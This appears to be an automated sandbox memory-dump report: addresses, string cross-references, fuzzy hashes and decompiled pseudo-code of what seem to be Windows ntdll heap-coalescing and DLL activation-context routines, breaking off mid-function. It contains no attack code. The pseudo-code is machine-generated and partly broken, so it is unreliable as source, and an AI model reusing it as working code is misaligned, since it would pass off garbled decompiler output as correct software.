                                                                            0x0109aa10
                                                                            0x0109aa16
                                                                            0x0109aa16
                                                                            0x0109aa1b
                                                                            0x0109aa21
                                                                            0x0109aa24
                                                                            0x0109aa27
                                                                            0x0109aa29
                                                                            0x0109aa2c
                                                                            0x0109aa32
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a978
                                                                            0x0109a978
                                                                            0x0109a97b
                                                                            0x0109a981
                                                                            0x0109a996
                                                                            0x0109a998
                                                                            0x0109a99f
                                                                            0x0109a9a2
                                                                            0x010e238a
                                                                            0x0109a9a8
                                                                            0x0109a9a8
                                                                            0x0109a9a8
                                                                            0x0109a9aa
                                                                            0x0109a9ad
                                                                            0x0109a9b0
                                                                            0x0109a9bb
                                                                            0x0109a9be
                                                                            0x0109a9c7
                                                                            0x0109a9c9
                                                                            0x0109a9c9
                                                                            0x0109a9cc
                                                                            0x0109a9d1
                                                                            0x0109aa6d
                                                                            0x0109aa70
                                                                            0x0109aa73
                                                                            0x0109aa75
                                                                            0x0109aa79
                                                                            0x0109aa7e
                                                                            0x0109aa82
                                                                            0x0109aa8f
                                                                            0x0109aa94
                                                                            0x0109aa96
                                                                            0x010e2392
                                                                            0x010e23a1
                                                                            0x010e23a1
                                                                            0x0109aa9c
                                                                            0x0109aa9f
                                                                            0x0109aaa2
                                                                            0x0109aaa2
                                                                            0x0109aaa8
                                                                            0x0109aaab
                                                                            0x0109aaaf
                                                                            0x00000000
                                                                            0x0109aab5
                                                                            0x00000000
                                                                            0x0109aab5
                                                                            0x0109a9d7
                                                                            0x0109a9d7
                                                                            0x0109a9da
                                                                            0x0109a9e0
                                                                            0x0109a9e3
                                                                            0x0109a9e6
                                                                            0x0109a9e9
                                                                            0x0109a9eb
                                                                            0x0109a9fd
                                                                            0x0109a9fd
                                                                            0x00000000
                                                                            0x0109a9eb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a983
                                                                            0x0109a983
                                                                            0x0109a983
                                                                            0x0109a987
                                                                            0x0109a995
                                                                            0x0109a995
                                                                            0x0109a995
                                                                            0x0109a995
                                                                            0x0109a989
                                                                            0x0109a98e
                                                                            0x00000000
                                                                            0x0109a990
                                                                            0x00000000
                                                                            0x0109a990
                                                                            0x0109a98e
                                                                            0x00000000
                                                                            0x0109a983
                                                                            0x0109a972
                                                                            0x0109a90a
                                                                            0x0109aa34
                                                                            0x0109aa34
                                                                            0x0109aa40
                                                                            0x0109aa43
                                                                            0x0109aa46
                                                                            0x0109aa4d
                                                                            0x010e23ab
                                                                            0x010e23b2
                                                                            0x010e23b8
                                                                            0x010e23be
                                                                            0x010e23c3
                                                                            0x010e23c5
                                                                            0x010e23cb
                                                                            0x010e23d1
                                                                            0x010e23d5
                                                                            0x010e23f6
                                                                            0x010e23fb
                                                                            0x010e23d7
                                                                            0x010e23ec
                                                                            0x010e23f1
                                                                            0x010e2403
                                                                            0x010e2408
                                                                            0x010e2410
                                                                            0x010e2417
                                                                            0x010e2422
                                                                            0x010e2422
                                                                            0x010e2417
                                                                            0x010e23c5
                                                                            0x010e23b2
                                                                            0x00000000

                                                                            Strings
                                                                            • HEAP: , xrefs: 010E22E6, 010E23F6
                                                                            • HEAP[%wZ]: , xrefs: 010E22D7, 010E23E7
                                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010E22F3
                                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 010E2403
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                            • API String ID: 0-1657114761
                                                                            • Opcode ID: ad29876b63d5a0f39532284e579028692bb43fca6b314926872f28a4ef700cd3
                                                                            • Instruction ID: d4d270293414acf3e1c102db3b435cfbc1dbb084b2a3c360ace992ba08ef455f
                                                                            • Opcode Fuzzy Hash: ad29876b63d5a0f39532284e579028692bb43fca6b314926872f28a4ef700cd3
                                                                            • Instruction Fuzzy Hash: F3D1AD34B00246DFDB19CF69C4A0BAEB7F1BF88200F1585A9D9DA9B746E334A941DB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 69%
                                                                            			E0109A229(void* __ecx, void* __edx) {
                                                                            				signed int _v20;
                                                                            				char _v24;
                                                                            				char _v28;
                                                                            				void* _v44;
                                                                            				void* _v48;
                                                                            				void* _v56;
                                                                            				void* _v60;
                                                                            				void* __ebx;
                                                                            				signed int _t55;
                                                                            				signed int _t57;
                                                                            				void* _t61;
                                                                            				intOrPtr _t62;
                                                                            				void* _t65;
                                                                            				void* _t71;
                                                                            				signed char* _t74;
                                                                            				intOrPtr _t75;
                                                                            				signed char* _t80;
                                                                            				intOrPtr _t81;
                                                                            				void* _t82;
                                                                            				signed char* _t85;
                                                                            				signed char _t91;
                                                                            				void* _t103;
                                                                            				void* _t105;
                                                                            				void* _t121;
                                                                            				void* _t129;
                                                                            				signed int _t131;
                                                                            				void* _t133;
                                                                            
                                                                            				_t105 = __ecx;
                                                                            				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                                            				_t103 = __edx;
                                                                            				_t129 = __ecx;
                                                                            				E0109DF24(__edx,  &_v28, _t133);
                                                                            				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                                            				asm("sbb edi, edi");
                                                                            				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                                            				if(_t55 != 0) {
                                                                            					_push(0);
                                                                            					_push(0x14);
                                                                            					_push( &_v24);
                                                                            					_push(3);
                                                                            					_push(_t129);
                                                                            					_push(0xffffffff);
                                                                            					_t57 = E010B9730();
                                                                            					__eflags = _t57;
                                                                            					if(_t57 < 0) {
                                                                            						L17:
                                                                            						_push(_t105);
                                                                            						E0113A80D(_t129, 1, _v20, 0);
                                                                            						_t121 = 4;
                                                                            						goto L1;
                                                                            					}
                                                                            					__eflags = _v20 & 0x00000060;
                                                                            					if((_v20 & 0x00000060) == 0) {
                                                                            						goto L17;
                                                                            					}
                                                                            					__eflags = _v24 - _t129;
                                                                            					if(_v24 == _t129) {
                                                                            						goto L1;
                                                                            					}
                                                                            					goto L17;
                                                                            				}
                                                                            				L1:
                                                                            				_push(_t121);
                                                                            				_push(0x1000);
                                                                            				_push(_t133 + 0x14);
                                                                            				_push(0);
                                                                            				_push(_t133 + 0x20);
                                                                            				_push(0xffffffff);
                                                                            				_t61 = E010B9660();
                                                                            				_t122 = _t61;
                                                                            				if(_t61 < 0) {
                                                                            					_t62 =  *[fs:0x30];
                                                                            					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                                            					__eflags =  *(_t62 + 0xc);
                                                                            					if( *(_t62 + 0xc) == 0) {
                                                                            						_push("HEAP: ");
                                                                            						E0107B150();
                                                                            					} else {
                                                                            						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                                            					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                                            					_push(_t129);
                                                                            					E0107B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                                            					_t65 = 0;
                                                                            					L13:
                                                                            					return _t65;
                                                                            				}
                                                                            				_t71 = E01097D50();
                                                                            				_t124 = 0x7ffe0380;
                                                                            				if(_t71 != 0) {
                                                                            					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            				} else {
                                                                            					_t74 = 0x7ffe0380;
                                                                            				}
                                                                            				if( *_t74 != 0) {
                                                                            					_t75 =  *[fs:0x30];
                                                                            					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                                            					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                                            						E0113138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                                            					}
                                                                            				}
                                                                            				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                                            				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                                            				if(E01097D50() != 0) {
                                                                            					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            				} else {
                                                                            					_t80 = _t124;
                                                                            				}
                                                                            				if( *_t80 != 0) {
                                                                            					_t81 =  *[fs:0x30];
                                                                            					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                                            					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                                            						__eflags = E01097D50();
                                                                            						if(__eflags != 0) {
                                                                            							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            						}
                                                                            						E01131582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                                            					}
                                                                            				}
                                                                            				_t82 = E01097D50();
                                                                            				_t125 = 0x7ffe038a;
                                                                            				if(_t82 != 0) {
                                                                            					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                            				} else {
                                                                            					_t85 = 0x7ffe038a;
                                                                            				}
                                                                            				if( *_t85 != 0) {
                                                                            					__eflags = E01097D50();
                                                                            					if(__eflags != 0) {
                                                                            						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                            						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                            					}
                                                                            					E01131582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                                            				}
                                                                            				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                                            				_t91 =  *(_t103 + 2);
                                                                            				if((_t91 & 0x00000004) != 0) {
                                                                            					E010CD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                                            					_t91 =  *(_t103 + 2);
                                                                            				}
                                                                            				 *(_t103 + 2) = _t91 & 0x00000017;
                                                                            				_t65 = 1;
                                                                            				goto L13;
                                                                            			}

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                            • API String ID: 2994545307-2586055223
                                                                            • Opcode ID: f421fa489b815d504943bd8c8cf30613b5646ee52c36f8037a1f8dec8c4f49b9
                                                                            • Instruction ID: 0569841bc29bb749b82c58fda43ccafbbc8100925328f906f314ad010d2e701f
                                                                            • Opcode Fuzzy Hash: f421fa489b815d504943bd8c8cf30613b5646ee52c36f8037a1f8dec8c4f49b9
                                                                            • Instruction Fuzzy Hash: 8951E3322056819FD722EB69C858F6B7BE8FF84750F0804A8F9D5CB291D735D800CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 44%
                                                                            			E010A8E00(void* __ecx) {
                                                                            				signed int _v8;
                                                                            				char _v12;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr* _t32;
                                                                            				intOrPtr _t35;
                                                                            				intOrPtr _t43;
                                                                            				void* _t46;
                                                                            				intOrPtr _t47;
                                                                            				void* _t48;
                                                                            				signed int _t49;
                                                                            				void* _t50;
                                                                            				intOrPtr* _t51;
                                                                            				signed int _t52;
                                                                            				void* _t53;
                                                                            				intOrPtr _t55;
                                                                            
                                                                            				_v8 =  *0x116d360 ^ _t52;
                                                                            				_t49 = 0;
                                                                            				_t48 = __ecx;
                                                                            				_t55 =  *0x1168464; // 0x74b10110
                                                                            				if(_t55 == 0) {
                                                                            					L9:
                                                                            					if( !_t49 >= 0) {
                                                                            						if(( *0x1165780 & 0x00000003) != 0) {
                                                                            							E010F5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                            						}
                                                                            						if(( *0x1165780 & 0x00000010) != 0) {
                                                                            							asm("int3");
                                                                            						}
                                                                            					}
                                                                            					return E010BB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                            				}
                                                                            				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                            				_t43 =  *0x1167984; // 0xc12b20
                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                            					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                            					if(_t48 == _t43) {
                                                                            						_t50 = 0x5c;
                                                                            						if( *_t32 == _t50) {
                                                                            							_t46 = 0x3f;
                                                                            							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                            								_t32 = _t32 + 8;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					_t51 =  *0x1168464; // 0x74b10110
                                                                            					 *0x116b1e0(_t47, _t32,  &_v12);
                                                                            					_t49 =  *_t51();
                                                                            					if(_t49 >= 0) {
                                                                            						L8:
                                                                            						_t35 = _v12;
                                                                            						if(_t35 != 0) {
                                                                            							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                            								E010A9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                            								_t35 = _v12;
                                                                            							}
                                                                            							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                            						}
                                                                            						goto L9;
                                                                            					}
                                                                            					if(_t49 != 0xc000008a) {
                                                                            						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                            							if(_t49 != 0xc00000bb) {
                                                                            								goto L8;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					if(( *0x1165780 & 0x00000005) != 0) {
                                                                            						_push(_t49);
                                                                            						E010F5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                            						_t53 = _t53 + 0x1c;
                                                                            					}
                                                                            					_t49 = 0;
                                                                            					goto L8;
                                                                            				} else {
                                                                            					goto L9;
                                                                            				}
                                                                            			}
                                                                            0x010a8ea4
                                                                            0x010a8e70
                                                                            0x010e9325
                                                                            0x010e9340
                                                                            0x010e9345
                                                                            0x010e9345
                                                                            0x010a8e76
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            Strings
                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 010E932A
                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 010E9357
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 010E933B, 010E9367
                                                                            • LdrpFindDllActivationContext, xrefs: 010E9331, 010E935D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 0-3779518884
                                                                            • Opcode ID: c6011d3f2393d839679064120ea8887896138240bdc6430a391ce449c880f46c
                                                                            • Instruction ID: 05c9e9b2dc870f1d86c20ce7f02d0dc64cd93597def22a99a9354c8d165a4c60
                                                                            • Opcode Fuzzy Hash: c6011d3f2393d839679064120ea8887896138240bdc6430a391ce449c880f46c
                                                                            • Instruction Fuzzy Hash: 4C411731A00311DEDBB6EB9DC84DA7AB6E5AB0034AF86C1BBDBD457151E7715DC08381
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                            • API String ID: 2994545307-336120773
                                                                            • Opcode ID: 0ec8f773c775b2d92eb3e501973dd1bb7db7fa3e8fd3530cc6e0e01b94be2da8
                                                                            • Instruction ID: 6c42c62dc4b5c098167b0d142218cf2fdd3a89c18f59ddd93cba44940fe69088
                                                                            • Opcode Fuzzy Hash: 0ec8f773c775b2d92eb3e501973dd1bb7db7fa3e8fd3530cc6e0e01b94be2da8
                                                                            • Instruction Fuzzy Hash: C1316B35100105EFD738DB59C889FABB7E8EF84620F154069F986CB654E771A881CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
                                                                            			E010999BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                                                            				char _v5;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed short _v20;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				signed short _t186;
                                                                            				intOrPtr _t187;
                                                                            				signed short _t190;
                                                                            				signed int _t196;
                                                                            				signed short _t197;
                                                                            				intOrPtr _t203;
                                                                            				signed int _t207;
                                                                            				signed int _t210;
                                                                            				signed short _t215;
                                                                            				intOrPtr _t216;
                                                                            				signed short _t219;
                                                                            				signed int _t221;
                                                                            				signed short _t222;
                                                                            				intOrPtr _t228;
                                                                            				signed int _t232;
                                                                            				signed int _t235;
                                                                            				signed int _t250;
                                                                            				signed short _t251;
                                                                            				intOrPtr _t252;
                                                                            				signed short _t254;
                                                                            				intOrPtr _t255;
                                                                            				signed int _t258;
                                                                            				signed int _t259;
                                                                            				signed short _t262;
                                                                            				intOrPtr _t271;
                                                                            				signed int _t279;
                                                                            				signed int _t282;
                                                                            				signed int _t284;
                                                                            				signed int _t286;
                                                                            				intOrPtr _t292;
                                                                            				signed int _t296;
                                                                            				signed int _t299;
                                                                            				signed int _t307;
                                                                            				signed int* _t309;
                                                                            				signed short* _t311;
                                                                            				signed short* _t313;
                                                                            				signed char _t314;
                                                                            				intOrPtr _t316;
                                                                            				signed int _t323;
                                                                            				signed char _t328;
                                                                            				signed short* _t330;
                                                                            				signed char _t331;
                                                                            				intOrPtr _t335;
                                                                            				signed int _t342;
                                                                            				signed char _t347;
                                                                            				signed short* _t348;
                                                                            				signed short* _t350;
                                                                            				signed short _t352;
                                                                            				signed char _t354;
                                                                            				intOrPtr _t357;
                                                                            				intOrPtr* _t364;
                                                                            				signed char _t365;
                                                                            				intOrPtr _t366;
                                                                            				signed int _t373;
                                                                            				signed char _t378;
                                                                            				signed int* _t381;
                                                                            				signed int _t382;
                                                                            				signed short _t384;
                                                                            				signed int _t386;
                                                                            				unsigned int _t390;
                                                                            				signed int _t393;
                                                                            				signed int* _t394;
                                                                            				unsigned int _t398;
                                                                            				signed short _t400;
                                                                            				signed short _t402;
                                                                            				signed int _t404;
                                                                            				signed int _t407;
                                                                            				unsigned int _t411;
                                                                            				signed short* _t414;
                                                                            				signed int _t415;
                                                                            				signed short* _t419;
                                                                            				signed int* _t420;
                                                                            				void* _t421;
                                                                            
                                                                            				_t414 = __edx;
                                                                            				_t307 = __ecx;
                                                                            				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                                                            				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                                                            					_v5 = _a8;
                                                                            					L3:
                                                                            					_t381 = _a4;
                                                                            					goto L4;
                                                                            				} else {
                                                                            					__eflags =  *(__ecx + 0x4c);
                                                                            					if( *(__ecx + 0x4c) != 0) {
                                                                            						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                                                            						 *_t419 = _t411;
                                                                            						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                                                            						__eflags = _t411 >> 0x18 - _t378;
                                                                            						if(__eflags != 0) {
                                                                            							_push(_t378);
                                                                            							E0112FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                                                            						}
                                                                            					}
                                                                            					_t250 = _a8;
                                                                            					_v5 = _t250;
                                                                            					__eflags = _t250;
                                                                            					if(_t250 != 0) {
                                                                            						_t400 = _t414[6];
                                                                            						_t53 =  &(_t414[4]); // -16
                                                                            						_t348 = _t53;
                                                                            						_t251 =  *_t348;
                                                                            						_v12 = _t251;
                                                                            						_v16 = _t400;
                                                                            						_t252 =  *((intOrPtr*)(_t251 + 4));
                                                                            						__eflags =  *_t400 - _t252;
                                                                            						if( *_t400 != _t252) {
                                                                            							L49:
                                                                            							_push(_t348);
                                                                            							_push( *_t400);
                                                                            							E0113A80D(_t307, 0xd, _t348, _t252);
                                                                            							L50:
                                                                            							_v5 = 0;
                                                                            							goto L11;
                                                                            						}
                                                                            						__eflags =  *_t400 - _t348;
                                                                            						if( *_t400 != _t348) {
                                                                            							goto L49;
                                                                            						}
                                                                            						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                            						_t407 =  *(_t307 + 0xb4);
                                                                            						__eflags = _t407;
                                                                            						if(_t407 == 0) {
                                                                            							L36:
                                                                            							_t364 = _v16;
                                                                            							_t282 = _v12;
                                                                            							 *_t364 = _t282;
                                                                            							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                                                            							__eflags = _t414[1] & 0x00000008;
                                                                            							if((_t414[1] & 0x00000008) == 0) {
                                                                            								L39:
                                                                            								_t365 = _t414[1];
                                                                            								__eflags = _t365 & 0x00000004;
                                                                            								if((_t365 & 0x00000004) != 0) {
                                                                            									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                            									_v12 = _t284;
                                                                            									__eflags = _t365 & 0x00000002;
                                                                            									if((_t365 & 0x00000002) != 0) {
                                                                            										__eflags = _t284 - 4;
                                                                            										if(_t284 > 4) {
                                                                            											_t284 = _t284 - 4;
                                                                            											__eflags = _t284;
                                                                            											_v12 = _t284;
                                                                            										}
                                                                            									}
                                                                            									_t78 =  &(_t414[8]); // -8
                                                                            									_t286 = E010CD540(_t78, _t284, 0xfeeefeee);
                                                                            									_v16 = _t286;
                                                                            									__eflags = _t286 - _v12;
                                                                            									if(_t286 != _v12) {
                                                                            										_t366 =  *[fs:0x30];
                                                                            										__eflags =  *(_t366 + 0xc);
                                                                            										if( *(_t366 + 0xc) == 0) {
                                                                            											_push("HEAP: ");
                                                                            											E0107B150();
                                                                            										} else {
                                                                            											E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            										}
                                                                            										_push(_v16 + 0x10 + _t414);
                                                                            										E0107B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                            										_t292 =  *[fs:0x30];
                                                                            										_t421 = _t421 + 0xc;
                                                                            										__eflags =  *((char*)(_t292 + 2));
                                                                            										if( *((char*)(_t292 + 2)) != 0) {
                                                                            											 *0x1166378 = 1;
                                                                            											asm("int3");
                                                                            											 *0x1166378 = 0;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								goto L50;
                                                                            							}
                                                                            							_t296 = E0109A229(_t307, _t414);
                                                                            							__eflags = _t296;
                                                                            							if(_t296 != 0) {
                                                                            								goto L39;
                                                                            							} else {
                                                                            								E0109A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                            								goto L50;
                                                                            							}
                                                                            						} else {
                                                                            							_t373 =  *_t414 & 0x0000ffff;
                                                                            							while(1) {
                                                                            								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                                                            								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                                                            									_t301 = _t373;
                                                                            									break;
                                                                            								}
                                                                            								_t299 =  *_t407;
                                                                            								__eflags = _t299;
                                                                            								if(_t299 == 0) {
                                                                            									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                            									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                            									break;
                                                                            								} else {
                                                                            									_t407 = _t299;
                                                                            									continue;
                                                                            								}
                                                                            							}
                                                                            							_t62 =  &(_t414[4]); // -16
                                                                            							E0109BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                                                            							goto L36;
                                                                            						}
                                                                            					}
                                                                            					L11:
                                                                            					_t402 = _t419[6];
                                                                            					_t25 =  &(_t419[4]); // -16
                                                                            					_t350 = _t25;
                                                                            					_t254 =  *_t350;
                                                                            					_v12 = _t254;
                                                                            					_v20 = _t402;
                                                                            					_t255 =  *((intOrPtr*)(_t254 + 4));
                                                                            					__eflags =  *_t402 - _t255;
                                                                            					if( *_t402 != _t255) {
                                                                            						L61:
                                                                            						_push(_t350);
                                                                            						_push( *_t402);
                                                                            						E0113A80D(_t307, 0xd, _t350, _t255);
                                                                            						goto L3;
                                                                            					}
                                                                            					__eflags =  *_t402 - _t350;
                                                                            					if( *_t402 != _t350) {
                                                                            						goto L61;
                                                                            					}
                                                                            					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                                                            					_t404 =  *(_t307 + 0xb4);
                                                                            					__eflags = _t404;
                                                                            					if(_t404 == 0) {
                                                                            						L20:
                                                                            						_t352 = _v20;
                                                                            						_t258 = _v12;
                                                                            						 *_t352 = _t258;
                                                                            						 *(_t258 + 4) = _t352;
                                                                            						__eflags = _t419[1] & 0x00000008;
                                                                            						if((_t419[1] & 0x00000008) != 0) {
                                                                            							_t259 = E0109A229(_t307, _t419);
                                                                            							__eflags = _t259;
                                                                            							if(_t259 != 0) {
                                                                            								goto L21;
                                                                            							} else {
                                                                            								E0109A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                                                            								goto L3;
                                                                            							}
                                                                            						}
                                                                            						L21:
                                                                            						_t354 = _t419[1];
                                                                            						__eflags = _t354 & 0x00000004;
                                                                            						if((_t354 & 0x00000004) != 0) {
                                                                            							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                                                            							__eflags = _t354 & 0x00000002;
                                                                            							if((_t354 & 0x00000002) != 0) {
                                                                            								__eflags = _t415 - 4;
                                                                            								if(_t415 > 4) {
                                                                            									_t415 = _t415 - 4;
                                                                            									__eflags = _t415;
                                                                            								}
                                                                            							}
                                                                            							_t91 =  &(_t419[8]); // -8
                                                                            							_t262 = E010CD540(_t91, _t415, 0xfeeefeee);
                                                                            							_v20 = _t262;
                                                                            							__eflags = _t262 - _t415;
                                                                            							if(_t262 != _t415) {
                                                                            								_t357 =  *[fs:0x30];
                                                                            								__eflags =  *(_t357 + 0xc);
                                                                            								if( *(_t357 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E0107B150();
                                                                            								} else {
                                                                            									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_push(_v20 + 0x10 + _t419);
                                                                            								E0107B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                                                            								_t271 =  *[fs:0x30];
                                                                            								_t421 = _t421 + 0xc;
                                                                            								__eflags =  *((char*)(_t271 + 2));
                                                                            								if( *((char*)(_t271 + 2)) != 0) {
                                                                            									 *0x1166378 = 1;
                                                                            									asm("int3");
                                                                            									 *0x1166378 = 0;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						_t381 = _a4;
                                                                            						_t414 = _t419;
                                                                            						_t419[1] = 0;
                                                                            						_t419[3] = 0;
                                                                            						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                                                            						 *_t419 =  *_t381;
                                                                            						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                                                            						L4:
                                                                            						_t420 = _t414 +  *_t381 * 8;
                                                                            						if( *(_t307 + 0x4c) == 0) {
                                                                            							L6:
                                                                            							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
